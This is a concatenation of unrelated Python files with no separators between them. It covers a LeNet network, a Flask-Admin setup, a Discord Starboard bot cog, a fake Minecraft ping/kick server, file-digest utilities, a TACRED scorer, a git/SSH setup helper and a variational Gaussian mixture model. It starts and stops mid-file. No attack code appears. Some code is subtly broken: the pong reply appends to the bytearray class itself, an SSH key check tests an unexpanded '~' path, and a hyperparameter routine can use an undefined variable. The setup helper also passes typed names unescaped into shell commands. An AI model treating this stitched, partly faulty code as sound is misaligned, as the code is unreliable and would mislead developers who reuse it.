added. # MCL is robust even without BN layer. self.conv = nn.Sequential( nn.Conv2d(in_channel, 20, 5, padding=2), nn.BatchNorm2d(20), nn.ReLU(inplace=True), nn.MaxPool2d(2, 2), nn.Conv2d(20, 50, 5, padding=2), nn.BatchNorm2d(50), nn.ReLU(inplace=True), nn.MaxPool2d(2, 2) ) self.linear = nn.Sequential( nn.Linear(self.n_feat, 500), nn.BatchNorm1d(500), nn.ReLU(inplace=True), ) self.last = nn.Linear(500, out_dim) # Subject to be replaced dependent on task def features(self, x): x = self.conv(x) x = self.linear(x.view(-1, self.n_feat)) return x def logits(self, x): x = self.last(x) return x def forward(self, x): x = self.features(x) x = self.logits(x) return x def LeNet32(out_dim): # LeNet with color input return LeNet(out_dim=out_dim, in_channel=1, img_sz=32) def LeNetC(out_dim): # LeNet with color input return LeNet(out_dim=out_dim, in_channel=3, img_sz=32)0 import os from flask_admin import Admin from .models import db, User from flask_admin.contrib.sqla import ModelView def setup_admin(app): app.secret_key = os.environ.get('FLASK_APP_KEY', 'sample key') app.config['FLASK_ADMIN_SWATCH'] = 'cerulean' admin = Admin(app, name='DB Studio', template_mode='bootstrap4') # Add your models here, for example this is how we add a the User model to the admin admin.add_view(ModelView(User, db.session)) # You can duplicate that line to add mew models # admin.add_view(ModelView(YourModelName, db.session))tayron1/Starboard-2 import discord from discord.ext import commands import config from app.i18n import ft_, t_ from app.utils import ms from ...classes.bot import Bot class Base(commands.Cog): "Basic information and commands" def __init__(self, bot: Bot) -> None: self.bot = bot self.about_starboard = ft_( "A Starboard is a bot that allows users of a server" ' to "vote" to "pin" a message. The main idea is this:\n' " - You set a channel as the starboard, typically called " "`#starboard`\n" " - You set an emoji for voting to pin messages, usually :star:\n" " - You set a limit (called requiredStars on this bot) that " "tells Starboard how many reactions (of the emoji you set) a " "message needs before it is sent to the starboard.\n\n" "Once a message reaches the requiredStars limit in reactions, " "Starboard will essentially copy the message and repost it in " "your starboard." ) @commands.command(name="help", brief="Get help with Starboard") @commands.bot_has_permissions(embed_links=True) async def starboard_help( self, ctx: commands.Context, *, command=None ) -> None: """Get help with Starboard""" if command: return await ctx.send_help(command) p = ctx.prefix embed = discord.Embed( title="Staboard Help", description=t_( "**[Starboard Documentation]({0.DOCS})**\n\n" "To see a complete command list, run `{1}commands`.\n" "To see a list of disabled commands, run `{1}disabled`.\n" "To list all prefixes, run `{1}prefixes`.\n" "For a list of useful links, run `{1}links`\n\n" "If you need any help, you can join [the support server]" "({0.SUPPORT_INVITE})" ).format(config, p), color=self.bot.theme_color, ).add_field( name=t_("What is a Starboard?"), value=t_(self.about_starboard) ) await ctx.send(embed=embed) @commands.command( name="botstats", aliases=["botinfo"], brief="Shows bot statistics" ) @commands.bot_has_permissions(embed_links=True) async def botinfo(self, ctx: commands.Context) -> None: """Sends guildCount and memberCount for each cluster""" clusters = [c for _, c in self.bot.stats.items()] total_guilds = sum([c["guilds"] for c in clusters]) total_members = sum([c["members"] for c in clusters]) embed = discord.Embed( title=t_("Bot Stats"), description=t_( "guilds: **{0}**\n" "users: **{1}**\n" "clusters: **{2}**\n" "shards: **{3}**" ).format( total_guilds, total_members, len(clusters), self.bot.shard_count, ), color=self.bot.theme_color, ) await ctx.send(embed=embed) @commands.command( name="ping", aliases=["latency"], brief="Shows current clusters and shards latency", ) @commands.bot_has_permissions(embed_links=True) async def ping(self, ctx: commands.Context) -> None: """Sends the latency of the current cluster and shard.""" cluster = self.bot.cluster_name shard = self.bot.get_shard(ctx.guild.shard_id if ctx.guild else 0) embed = discord.Embed(title=t_("Pong!"), color=self.bot.theme_color) embed.add_field( name=t_("Cluster **{0}**").format(cluster), value=t_("{0} ms").format(ms(self.bot.latency)), inline=False, ) embed.add_field( name=t_("Shard **{0}**").format(shard.id), value=t_("{0} ms").format(ms(shard.latency)), inline=False, ) await ctx.send(embed=embed) @commands.command( name="links", aliases=["invite", "support"], brief="Lists important/useful links", ) @commands.bot_has_permissions(embed_links=True) async def links(self, ctx: commands.Context) -> None: """Shows important/useful links""" embed = ( discord.Embed( title=t_("Important Links"), color=self.bot.theme_color, description=t_( "**[Documentation]({0.DOCS})**\n" "**[Support Server]({0.SUPPORT_INVITE})**\n" "**[Invite Starboard]({0.BOT_INVITE})**\n" ).format(config), ) .add_field( name=t_("Support Starboard"), value=str( "**" + "\n".join(config.DONATE_LINKS) + t_("\n[Become a Patron]({0.PATREON_LINK})**").format( config ) ), ) .add_field( name=t_("Vote Links"), value=str("**" + "\n".join(config.VOTE_LINKS) + "**"), inline=False, ) .add_field( name=t_("Review Links"), value=str("**" + "\n".join(config.REVIEW_LINKS) + "**"), inline=False, ) ) await ctx.send(embed=embed) @commands.command( name="vote", aliases=["votes"], brief="View vote links and number of times you've voted", ) @commands.bot_has_permissions(embed_links=True) async def vote( self, ctx: commands.Context, user: discord.User = None ) -> None: """Shows the number of times you or another user has voted, and also lists voting links""" user = user or ctx.message.author if user.bot: await ctx.send( t_( "{0} is a bot. How many times do you " "think they've voted?" ).format(user) ) return sql_user = await self.bot.db.users.get(user.id) if sql_user: count = sql_user["votes"] else: count = 0 embed = ( discord.Embed( title=t_("Vote for Starboard"), color=self.bot.theme_color, description=t_("You have voted **{0}** time(s).").format(count) if user.id == ctx.message.author.id else t_("**{0}** has voted **{1}** time(s).").format( user, count ), inline=False, ) .add_field( name=t_("Vote Links"), value="**" + "\n".join(config.VOTE_LINKS) + "**", inline=False, ) .add_field( name=t_("Review Links"), value="**" + "\n".join(config.REVIEW_LINKS) + "**", inline=False, ) ) await ctx.send(embed=embed) def setup(bot: Bot) -> None: bot.add_cog(Base(bot)) #!/usr/bin/python # encoding: utf-8 from util import DEFAULT_SETTINGS from workflow import Workflow, ICON_INFO import sys class Base(object): def __init__(self): wf = Workflow(default_settings=DEFAULT_SETTINGS, update_settings={ 'github_slug': 'cleobis/alfred-cal', } ) self.wf = wf self.log = wf.logger self.args = wf.args if "-set" in self.args: # option to config.py. self.args.remove("-set") if len(self.args) > 1: self.log.error("Expected only one argument. If testing from command line, wrap arguments in double quotes.") self.args = self.args[0] if len(wf.args) > 0 else "" def execute(self): if self.wf.update_available: self.wf.add_item('New version available', 'Action this item to install the update', autocomplete='workflow:update', icon=ICON_INFO) sys.exit(self.wf.run(self.main)) def main(self, wf): pass import json import socket import uuid from threading import Thread import byte_utils class SocketServer: def __init__(self, ip, port, motd, version_text, kick_message, samples, server_icon, logger, show_hostname, player_max, player_online, protocol): self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.ip = ip self.port = port self.motd = motd self.version_text = version_text self.kick_message = kick_message self.samples = samples self.server_icon = server_icon self.logger = logger self.show_hostname = show_hostname self.player_max = player_max self.player_online = player_online self.protocol = protocol def on_new_client(self, client_socket, addr): data = client_socket.recv(1024) client_ip = addr[0] fqdn = socket.getfqdn(client_ip) if self.show_hostname and client_ip != fqdn: client_ip = fqdn + "/" + client_ip try: (length, i) = byte_utils.read_varint(data, 0) (packetID, i) = byte_utils.read_varint(data, i) if packetID == 0: (version, i) = byte_utils.read_varint(data, i) (ip, i) = byte_utils.read_utf(data, i) ip = ip.replace('\x00', '').replace("\r", "\\r").replace("\t", "\\t").replace("\n", "\\n") is_using_fml = False if ip.endswith("FML"): is_using_fml = True ip = ip[:-3] (port, i) = byte_utils.read_ushort(data, i) (state, i) = byte_utils.read_varint(data, i) if state == 1: self.logger.info(("[%s:%s] Received client " + ("(using ForgeModLoader) " if is_using_fml else "") + "ping packet (%s:%s).") % (client_ip, addr[1], ip, port)) motd = {} motd["version"] = {} motd["version"]["name"] = self.version_text motd["version"]["protocol"] = self.protocol motd["players"] = {} motd["players"]["max"] = self.player_max motd["players"]["online"] = self.player_online motd["players"]["sample"] = [] for sample in self.samples: motd["players"]["sample"].append({"name": sample, "id": str(uuid.uuid4())}) motd["description"] = {"text": self.motd} if self.server_icon and len(self.server_icon) > 0: motd["favicon"] = self.server_icon self.write_response(client_socket, json.dumps(motd)) elif state == 2: name = "" if len(data) != i: (some_int, i) = byte_utils.read_varint(data, i) (some_int, i) = byte_utils.read_varint(data, i) (name, i) = byte_utils.read_utf(data, i) self.logger.info( ("[%s:%s] " + (name + " t" if len(name) > 0 else "T") + "ries to connect to the server " + ("(using ForgeModLoader) " if is_using_fml else "") + "(%s:%s).") % (client_ip, addr[1], ip, port)) self.write_response(client_socket, json.dumps({"text": self.kick_message})) else: self.logger.info( "[%s:%d] Tried to request a login/ping with an unknown state: %d" % (client_ip, addr[1], state)) elif packetID == 1: (long, i) = byte_utils.read_long(data, i) response = bytearray() byte_utils.write_varint(response, 9) byte_utils.write_varint(response, 1) bytearray.append(long) client_socket.sendall(bytearray) self.logger.info("[%s:%d] Responded with pong packet." % (client_ip, addr[1])) else: self.logger.warning("[%s:%d] Sent an unexpected packet: %d" % (client_ip, addr[1], packetID)) except (TypeError, IndexError): self.logger.warning("[%s:%s] Received invalid data (%s)" % (client_ip, addr[1], data)) return def write_response(self, client_socket, response): response_array = bytearray() byte_utils.write_varint(response_array, 0) byte_utils.write_utf(response_array, response) length = bytearray() byte_utils.write_varint(length, len(response_array)) client_socket.sendall(length) client_socket.sendall(response_array) def start(self): self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.sock.bind((self.ip, self.port)) self.sock.settimeout(5000) self.sock.listen(30) self.logger.info("Server started on %s:%s! Waiting for incoming connections..." % (self.ip, self.port)) while 1: (client, address) = self.sock.accept() Thread(target=self.on_new_client, daemon=True, args=(client, address,)).start() def close(self): self.sock.close() """Generic functionality related to files and I/O""" import csv import email.parser import email.policy import hashlib import os import re import zipfile from dataclasses import dataclass, field from pathlib import Path from typing import Iterable, Optional, Pattern, Sequence @dataclass class ArchiveMapping: """A mapping between an archive file name and its corresponding source filesystem path""" source_file_name: Path archive_file_name: Path @dataclass class FunctionLayerMappings: """A function and requirements layer mapping and digest container""" function_mappings: Sequence[ArchiveMapping] = field(default=list) function_digest: str = None requirements_mappings: Sequence[ArchiveMapping] = field(default=list) requirements_digest: str = None def format_file_size(size_in_bytes: float) -> str: """Return a string representation of the specified size as its largest 2^10 representation Examples: >>> format_file_size(2048) '2.00 KiB' >>> format_file_size(16252928.0) '15.50 MiB' Args: size_in_bytes: a size in bytes Returns: a string representation of the specified size as its largest 2^10 representation""" for unit in ('B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB'): if abs(size_in_bytes) < 1024.0: return f'{size_in_bytes:.2f} {unit}' size_in_bytes /= 1024.0 return f'{size_in_bytes:.2f} YiB' def get_digest(source_file_names: Sequence[Path], block_size: int = 8192) -> Optional[str]: """Return a SHA256 hash composed from the content of all source files. Args: source_file_names: A sequence of source file paths Returns: A SHA256 hash composed from the content of all source files.""" # See the PEP-376 RECORD file specification: package_record_pattern = re.compile(r'\.dist-info/RECORD$') egg_information_pattern = re.compile(r'\.egg-info/PKG-INFO$') digest = hashlib.sha256() full = set(source_file_names) done = set() if not full: return None for source_file_name in sorted(full): if package_record_pattern.search(str(source_file_name)): package_parent_path = source_file_name.parent.parent with open(source_file_name, 'r', buffering=block_size) as record: reader = csv.reader(record, delimiter=',', quotechar='"', lineterminator=os.linesep) for item in reader: item_name, item_hash, _other = item[:3] source_file_name = package_parent_path / item_name if item_hash and source_file_name in full: digest.update((str(item_name) + item_hash).encode()) done.add(source_file_name) remaining = full - done for source_file_name in sorted(remaining): with open(source_file_name, 'rb', buffering=block_size) as source_file: if egg_information_pattern.search(str(source_file_name)): # Ensure deterministic field order from PKG-INFO files # See: https://www.python.org/dev/peps/pep-0314/#including-metadata-in-packages parser = email.parser.BytesHeaderParser(policy=email.policy.default) source_headers = sorted(parser.parse(source_file).items()) for header, value in source_headers: digest.update(header.encode()) digest.update(value.encode()) else: digest.update(source_file.read()) return digest.hexdigest() def get_relative_file_names(source_path: Path, exclude_patterns: Sequence[Pattern] = None) -> Iterable[Path]: """Return an unsorted iterable of files recursively beneath the source path Args: source_path: a filesystem path from which to recursively iterate all files exclude_patterns: an optional sequence of regular expressions which will be used to exclude files Returns: an unsorted iterable of files recursively beneath the source path""" exclude_patterns = exclude_patterns or [] for root, _directory_names, file_names in os.walk(source_path): for file_name in file_names: relative_file_name = Path(os.path.join(root, file_name)).relative_to(source_path) if not any([pattern.match(str(relative_file_name)) for pattern in exclude_patterns]): yield relative_file_name def write_archive(archive_file_name: Path, archive_mappings: Iterable[ArchiveMapping]) -> None: """Write a zip file archive composed of the specified archive file mappings Args: archive_file_name: a writable file archive_mappings: an iterable of mappings of filesystem file names to archive file names""" with zipfile.ZipFile(archive_file_name, 'w', compression=zipfile.ZIP_DEFLATED, compresslevel=9) as archive: for mapping in archive_mappings: archive.write(filename=mapping.source_file_name, arcname=mapping.archive_file_name) #define the function def flow_control(k): #define a string based on the value of k if(k==0): s="the variable k = %d equals 0." %k elif(k==1): s="the variable k = %d equals 1." %k else: s="the variable k = %d does not equal 0 or 1." %k #now we print the s print(s) #define a main function def main(): #declare integer x=0 #try flow control for 0, 1, 2 (basically, it is testing different integers in flow_control) flow_control(x) x=1 flow_control(x) x=2 flow_control(x) #run code if __name__=="__main__": main()relex/evaluation/tacred_evaluation.py from typing import Optional import sys from collections import Counter from relex.predictors.predictor_utils import load_predictor from relex.models.model_utils import batched_predict_instances NO_RELATION = "no_relation" def score(key, prediction, verbose=False): # TODO: state source correct_by_relation = Counter() guessed_by_relation = Counter() gold_by_relation = Counter() # Loop over the data to compute a score for row in range(len(key)): gold = key[row] guess = prediction[row] if gold == NO_RELATION and guess == NO_RELATION: pass elif gold == NO_RELATION and guess != NO_RELATION: guessed_by_relation[guess] += 1 elif gold != NO_RELATION and guess == NO_RELATION: gold_by_relation[gold] += 1 elif gold != NO_RELATION and guess != NO_RELATION: guessed_by_relation[guess] += 1 gold_by_relation[gold] += 1 if gold == guess: correct_by_relation[guess] += 1 # Print verbose information if verbose: print("Per-relation statistics:") relations = gold_by_relation.keys() longest_relation = 0 for relation in sorted(relations): longest_relation = max(len(relation), longest_relation) for relation in sorted(relations): # (compute the score) correct = correct_by_relation[relation] guessed = guessed_by_relation[relation] gold = gold_by_relation[relation] prec = 1.0 if guessed > 0: prec = float(correct) / float(guessed) recall = 0.0 if gold > 0: recall = float(correct) / float(gold) f1 = 0.0 if prec + recall > 0: f1 = 2.0 * prec * recall / (prec + recall) # (print the score) sys.stdout.write(("{:<" + str(longest_relation) + "}").format(relation)) sys.stdout.write(" P: ") if prec < 0.1: sys.stdout.write(" ") if prec < 1.0: sys.stdout.write(" ") sys.stdout.write("{:.2%}".format(prec)) sys.stdout.write(" R: ") if recall < 0.1: sys.stdout.write(" ") if recall < 1.0: sys.stdout.write(" ") sys.stdout.write("{:.2%}".format(recall)) sys.stdout.write(" F1: ") if f1 < 0.1: sys.stdout.write(" ") if f1 < 1.0: sys.stdout.write(" ") sys.stdout.write("{:.2%}".format(f1)) sys.stdout.write(" #: %d" % gold) sys.stdout.write("\n") print("") # Print the aggregate score if verbose: print("Final Score:") prec_micro = 1.0 if sum(guessed_by_relation.values()) > 0: prec_micro = (float(sum(correct_by_relation.values())) / float(sum(guessed_by_relation.values()))) recall_micro = 0.0 if sum(gold_by_relation.values()) > 0: recall_micro = (float(sum(correct_by_relation.values())) / float(sum(gold_by_relation.values()))) f1_micro = 0.0 if prec_micro + recall_micro > 0.0: f1_micro = 2.0 * prec_micro * recall_micro / (prec_micro + recall_micro) print("Precision (micro): {:.3%}".format(prec_micro)) print(" Recall (micro): {:.3%}".format(recall_micro)) print(" F1 (micro): {:.3%}".format(f1_micro)) return prec_micro, recall_micro, f1_micro def evaluate(model_dir: str, test_file: str, archive_filename: str = "model.tar.gz", cuda_device: int = -1, predictor_name: str = "relation_classifier", weights_file: Optional[str] = None, batch_size: int = 16) -> str: predictor = load_predictor(model_dir, predictor_name, cuda_device, archive_filename, weights_file) test_instances = predictor._dataset_reader.read(test_file) # pylint: disable=protected-access test_results = batched_predict_instances(predictor, test_instances, batch_size) true_labels = [instance["label"].label for instance in test_instances] predicted_labels = [result["label"] for result in test_results] return score(true_labels, predicted_labels) 1-10 from person.models import POS_X, POS_Y def get_position(number): number = str(number) first = number[0] second = number[1] if first == '1' or first == '2': pos_y = POS_Y[0][1] elif first == '4' or first == '3': pos_y = POS_Y[1][1] elif first == '5' or first == '6': pos_y = POS_Y[2][1] elif first == '8' or first == '7': pos_y = POS_Y[3][1] if first == '1' or first == '4' or first == '5' or first == '8': pos_x = 175 - (int(second) - 1) * 25 elif first == '2' or first == '3' or first == '6' or first == '7': pos_x = 210 + (int(second) - 1) * 25 return pos_x, pos_y import os import click import platform def sys_info(): """Check the current operating system, return either darwin or linux or windows.""" return platform.system() def validate_path(path): """Validate a path""" return os.path.isdir(path) def error(msg): return click.secho(msg, fg='red') def warning(msg): return click.secho(msg, fg='yellow') def info(msg): return click.secho(msg, fg='blue') def success(msg): return click.secho(msg, fg='green') def git_configure(): click.echo("Configuring git globally") # backup the original one os.system('cp ~/.gitconfig ~/.gitconfig.backup') git_user_name = click.prompt('Please input your name:', type=str) git_user_mail = click.prompt('Please input your email address:', type=str) cmd_name = f'git config --global user.name "{git_user_name}"' cmd_mail = f'git config --global user.mail "{git_user_mail}"' os.system(cmd_name) os.system(cmd_mail) def copy_and_show_ssh(operating_system): # add to ssh agent # copy to clipboard # show at the console # start the ssh agent in the background os.system('eval "$(ssh-agent -s)"') os.system('ssh-add ~/.ssh/id_rsa') if operating_system == 'linux': """Install xclip for linux operating systems""" click.echo( 'We need to install xclip to copy data to the clipboard,you will be asked to enter ur password:') os.system('sudo apt-get install xclip') os.system('xclip -sel clip < ~/.ssh/id_rsa.pub') elif operating_system == 'darwin': os.system('pbcopy < ~/.ssh/id_rsa.pub') click.echo( 'Copies the contents of the id_rsa.pub file to your clipboard succeeded, if not you can also copy the ' 'contents below manually:') os.system('clear') os.system('cat ~/.ssh/id_rsa.pub') warning('Now open github.com and your github settings, paste the copied content(or contents above) to the new SSH ' 'key!') def ssh_configure(operating_system): # check installed ? if os.path.isfile('~/.ssh/id_rsa.pub'): copy_and_show_ssh(operating_system) else: # create new else click.echo("No valid ssh key found! Generating a new one: (Type enter to continue)") os.system("ssh-keygen -t rsa -b 4096 -N ''") copy_and_show_ssh(operating_system) #!/usr/bin/env python # -*- coding: utf-8 -*- """ Class of variatonal Gaussian Mixture Image models. It serves as a baseline for a hidden Potts-MRF for Bayesian unsupervised image segmentation. Author: Date: 29-11-2018 """ import numpy as np import numpy.random as rnd from numpy.linalg import inv, cholesky from scipy.misc import logsumexp from scipy.special import betaln, digamma, gammaln from scipy.spatial.distance import cdist from sklearn.cluster import KMeans from sklearn.mixture import GaussianMixture from sklearn.neighbors import KNeighborsClassifier import matplotlib.pyplot as plt from vis import plot_posteriors class VariationalMixture(object): """ Superclass of variational mixture models. Methods are functions common to all submixture models. """ def log_multivariate_gamma(self, n, p): """ Logarithmic multivariate gamma function. This function is necessary for expectations and partition functions of Wishart distributions. See also: https://en.wikipedia.org/wiki/Multivariate_gamma_function Parameters ---------- nu : float Degrees of freedom. p : int Dimensionality. Returns ------- Gp : float p-th order multivariate gamma function. """ # Check for appropriate degree of freedom if not n > (p-1): raise ValueError('Degrees of freedom too low for dimensionality.') # Preallocate Gp = 0 # Product from d=1 to p for d in range(1, p+1): # Gamma function of degrees of freedom and dimension Gp += gammaln((n + 1 - d)/2) return (p * (p-1) / 4)*np.log(np.pi) + Gp def multivariate_digamma(self, n, p): """ Multivariate digamma function. This function is necessary for expectations and partition functions of Wishart distributions. See also: https://en.wikipedia.org/wiki/Multivariate_gamma_function Parameters ---------- nu : float Degrees of freedom. p : int Dimensionality. Returns ------- Pp : float p-th order multivariate digamma function. """ # Check for appropriate degree of freedom if not n > (p-1): raise ValueError('Degrees of freedom too low for dimensionality.') # Preallocate Pp = 0 # Sum from d=1 to D for d in range(1, p+1): # Digamma function of degrees of freedom and dimension Pp += digamma((n + 1 - d)/2) return Pp def log_partition_Wishart(self, W, n): """ Logarithmic partition function of the Wishart distribution. To compute variational expectations, the partition of the Wishart distribution is sometimes needed. The current computation follows Appendix B, equations B.78 to B.82 from Bishop's "Pattern Recognition & Machine Learning." Parameters ---------- W : array Positive definite, symmetric precision matrix. nu : int Degrees of freedom. Returns ------- B : float Partition of Wishart distribution. """ # Extract dimensionality D, D_ = W.shape # Check for symmetric matrix if not D == D_: raise ValueError('Matrix is not symmetric.') # Check for appropriate degree of freedom if not n > D-1: raise ValueError('Degrees of freedom too low for dimensionality.') # Compute log-multivariate gamma lmG = self.log_multivariate_gamma(n, D) # Compute partition function B = (-n/2)*self.log_det(W) - (n*D/2)*np.log(2) - lmG return B def entropy_Wishart(self, W, n): """ Entropy of the Wishart distribution. To compute variational expectations, the entropy of the Wishart distribution is sometimes needed. The current computation follows Appendix B, equations B.78 to B.82 from Bishop's "Pattern Recognition & Machine Learning." Parameters ---------- W : array Positive definite, symmetric precision matrix. nu : int Degrees of freedom. Returns ------- H : float Entropy of Wishart distribution. """ # Extract dimensionality D, D_ = W.shape # Check for symmetric matrix if not D == D_: raise ValueError('Matrix is not symmetric.') # Check for appropriate degree of freedom if not n > D-1: raise ValueError('Degrees of freedom too low for dimensionality.') # Expected log-determinant of precision matrix E = self.multivariate_digamma(n, D) + D*np.log(2) + self.log_det(W) # Entropy H = -self.log_partition_Wishart(W, n) - (n - D - 1)/2 * E + n*D/2 return H def log_det(self, A): """ Numerically stable computation of log determinant of a matrix. Parameters ---------- A : array Expecting a positive definite, symmetric matrix. Returns ------- float Log-determinant of given matrix. """ # Perform cholesky decomposition L = cholesky(A) # Stable log-determinant return np.sum(2*np.log(np.diag(L))) def distW(self, X, S): """ Compute weighted distance. Parameters ---------- X : array Vectors (N by D) or (H by W by D). W : array Weights (D by D). Returns ------- array Weighted distance for each vector. """ if not S.shape[0] == S.shape[1]: raise ValueError('Weight matrix not symmetric.') if not X.shape[-1] == S.shape[0]: raise ValueError('Dimensionality of data and weights mismatch.') if len(X.shape) == 2: # Shapes N, D = X.shape # Preallocate A = np.zeros((N,)) # Loop over samples for n in range(N): # Compute weighted inner product between vectors A[n] = X[n, :] @ S @ X[n, :].T elif len(X.shape) == 3: # Shape H, W, D = X.shape # Preallocate A = np.zeros((H, W)) # Loop over samples for h in range(H): for w in range(W): # Compute weighted inner product between vectors A[h, w] = X[h, w, :] @ S @ X[h, w, :].T return A def one_hot(self, A): """ Map array to pages with binary encodings. Parameters ---------- A : array 2-dimensional array of integers Returns ------- B : array (height by width by number of unique integers in A) 3-dimensional array with each page as an indicator of value in A. """ # Unique values labels = np.unique(A) # Preallocate new array B = np.zeros((*A.shape, len(labels))) # Loop over unique values for i, label in enumerate(labels): B[:, :, i] = (A == label) return B class UnsupervisedGaussianMixture(VariationalMixture): """ Variational Gaussian Mixture Image model. This implementation multivariate images (height by width by channel). It is based on the RPubs note by : https://rpubs.com/cakapourani/variational-bayes-gmm """ def __init__(self, num_channels=1, num_components=2, init_params='nn', max_iter=10, tol=1e-5): """ Model-specific constructors. Parameters ---------- num_channels : int Number of channels of image (def: 1). num_components : int Number of components (def: 2). theta0 : tuple Prior hyperparameters. max_iter : int Maximum number of iterations to run for (def: 10). tol : float Tolerance on change in x-value (def: 1e-5). Returns ------- None """ # Store data dimensionality if num_channels >= 1: self.D = num_channels else: raise ValueError('Number of channels must be larger than 0.') # Store model parameters if num_components >= 2: self.K = num_components else: raise ValueError('Too few components specified') # Optimization parameters self.init_params = init_params self.max_iter = max_iter self.tol = tol # Set prior hyperparameters self.set_prior_hyperparameters(D=num_channels, K=num_components) def set_prior_hyperparameters(self, D, K, a0=np.array([0.1]), b0=np.array([0.1]), n0=np.array([2.0]), m0=np.array([0.0]), W0=np.array([1.0])): """ Set hyperparameters of prior distributions. Default prior hyperparameters are minimally informative symmetric parameters. Parameters ---------- D : int Dimensionality of data. K : int Number of components. a0 : float / array (components by None) Hyperparameters of Dirichlet distribution on component weights. b0 : float / array (components by None) Scale parameters for hypermean normal distribution. n0 : array (components by None) Degrees of freedom for Wishart precision prior. m0 : array (components by dimensions) Hypermeans. W0 : array (dimensions by dimensions by components) Wishart precision parameters. Returns ------- theta : tuple """ # Expand alpha's if necessary if not a0.shape[0] == K: a0 = np.tile(a0[0], (K,)) # Expand beta's if necessary if not b0.shape[0] == K: b0 = np.tile(b0[0], (K,)) # Expand nu's if necessary if not n0.shape[0] == K: # Check for sufficient degrees of freedom if n0[0] < D: print('Cannot set Wishart degrees of freedom lower than data \ dimensionality.\n Setting it to data dim.') n0 = np.tile(D, (K,)) else: n0 = np.tile(n0[0], (K,)) # Expand hypermeans if necessary if not np.all(m0.shape == (K, D)): # If mean vector given, replicate to each component if len(m0.shape) == 2: if m0.shape[1] == D: m0 = np.tile(m0, (K, 1)) else: m0 = np.tile(m0[0], (K, D)) # Expand hypermeans if necessary if not np.all(W0.shape == (D, D, K)): # If single covariance matrix given, replicate to each component if len(W0.shape) == 2: if np.all(m0.shape[:2] == (D, D)): W0 = np.tile(W0, (1, 1, K)) else: W0_ = np.zeros((D, D, K)) for k in range(K): W0_[:, :, k] = W0[0]*np.eye(D) # Store tupled parameters as model attribute self.theta0 = (a0, b0, n0, m0, W0_) def initialize_posteriors(self, X): """ Initialize posterior hyperparameters Parameters ---------- X : array Observed image (height by width by channels) Returns ------- theta : tuple Set of parameters. """ # Current shape H, W, D = X.shape # Reshape arrays X = X.reshape((H*W, D)) if self.init_params == 'random': # Dirichlet concentration hyperparameters at = np.ones((self.K,))*(H*W)/2 # Normal precision-scale hyperparameters bt = np.ones((self.K,))*(H*W)/2 # Wishart degrees of freedom nt = np.ones((self.K,))*(H*W)/2 mt = np.zeros((self.K, D)) Wt = np.zeros((D, D, self.K)) for k in range(self.K): # Hypermeans mt[k, :] = np.mean(X, axis=0) + rnd.randn(1, D)*.1 # Hyperprecisions Wt[:, :, k] = np.eye(D) # Initialize variational posterior responsibilities rho = np.ones((H, W, self.K)) / self.K elif self.init_params in ('kmeans', 'k-means'): # Fit k-means to data and obtain cluster assignment label = KMeans(n_clusters=self.K, n_init=1).fit(X).labels_ # Set rho based on cluster labels rho = np.zeros((H*W, self.K)) rho[np.arange(H*W), label] = 1 # Dirichlet concentration hyperparameters at = np.sum(rho, axis=0) # Normal precision-scale hyperparameters bt = np.sum(rho, axis=0) # Wishart degrees of freedom nt = np.sum(rho, axis=0) mt = np.zeros((self.K, D)) Wt = np.zeros((D, D, self.K)) for k in range(self.K): # Hypermeans mt[k, :] = np.sum(rho[:, [k]] * X, axis=0) / np.sum(rho[:, k]) # Hyperprecisions Wt[:, :, k] = np.eye(D) else: raise ValueError('Provided method not recognized.') return (at, bt, nt, mt, Wt), rho def free_energy(self, X, rho, thetat, report=True): """ Compute free energy term to monitor progress. Parameters ---------- X : array Observed image (height by width by channels). rho : array Array of variational parameters (height by width by channels). thetat : array Parameters of variational posteriors. theta0 : array Parameters of variational priors. report : bool Print value of free energy function. Returns ------- rho : array Updated array of variational parameters. """ # Shapes H, W, D = X.shape # Reshape arrays X = X.reshape((H*W, D)) rho = rho.reshape((H*W, self.K)) # Unpack parameter sets a0, b0, n0, m0, W0 = self.theta0 at, bt, nt, mt, Wt = thetat # Preallocate terms for energy function E1 = 0 E2 = 0 E3 = 0 E4 = 0 E5 = 0 E6 = 0 E7 = 0 # Loop over classes for k in range(self.K): ''' Convenience variables ''' # Proportion assigned to each component Nk = np.sum(rho[:, k], axis=0) # Responsibility-weighted mean xk = np.sum(rho[:, [k]] * X, axis=0) / Nk # Reponsibility-weighted variance Sk = ((X - xk) * rho[:, [k]]).T @ (X - xk) / Nk # Mahalanobis distance from hypermean mWm = (mt[k, :] - m0[k, :]).T @ Wt[:, :, k] @ (mt[k, :] - m0[k, :]) # Mahalanobis distance from responsibility-weighted mean xWx = (xk - mt[k, :]) @ Wt[:, :, k] @ (xk - mt[k, :]).T # Entropy-based terms Elog_pik = digamma(at[k]) - digamma(np.sum(at)) Elog_Lak = (D*np.log(2) + self.log_det(Wt[:, :, k]) + self.multivariate_digamma(nt[k], D)) ''' Energy function ''' # First term E1 += Nk/2*(Elog_Lak - D / bt[k] - nt[k]*(np.trace(Sk @ Wt[:, :, k]) + xWx) - D*np.log(2*np.pi)) # Second term E2 += np.sum(rho[:, k] * Elog_pik, axis=0) # Third term E3 += (a0[k] - 1)*Elog_pik + (gammaln(np.sum(a0)) - np.sum(gammaln(a0))) / self.K # Fourth term E4 += 1/2*(D*np.log(b0[k] / (2*np.pi)) + Elog_Lak - D*b0[k]/bt[k] - b0[k]*nt[k]*mWm + (n0[k] - D - 1)*Elog_Lak - 2*self.log_partition_Wishart(Wt[:, :, k], nt[k]) + nt[k]*np.trace(inv(W0[:, :, k])*Wt[:, :, k])) # Ignore underflow error from log rho with np.errstate(under='ignore') and np.errstate(divide='ignore'): # Set -inf to most negative number lrho = np.maximum(np.log(rho[:, k]), np.finfo(rho.dtype).min) # Fifth term E5 += np.sum(rho[:, k] * lrho, axis=0) # Sixth term E6 += (at[k] - 1)*Elog_pik + (gammaln(np.sum(at)) - np.sum(gammaln(at))) / self.K # Seventh term E7 += (Elog_Lak/2 + D/2*np.log(bt[k] / (2*np.pi)) - D/2 - self.entropy_Wishart(Wt[:, :, k], nt[k])) # Compute free energy term F = E1 + E2 + E3 + E4 - E5 - E6 - E7 # Print free energy if report: print('Free energy = ' + str(F)) return F def expectation_step(self, X, thetat, savefn=''): """ Perform expectation step. Parameters ---------- X : array Observed image (height by width by channels). thetat : array Current iteration of parameters of variational posteriors. Returns ------- rho : array Updated array of variational parameters / responsibilities. """ # Shape of variational parameter array H, W, D = X.shape # Reshape arrays X = X.reshape((H*W, D)) # Unpack tuple of 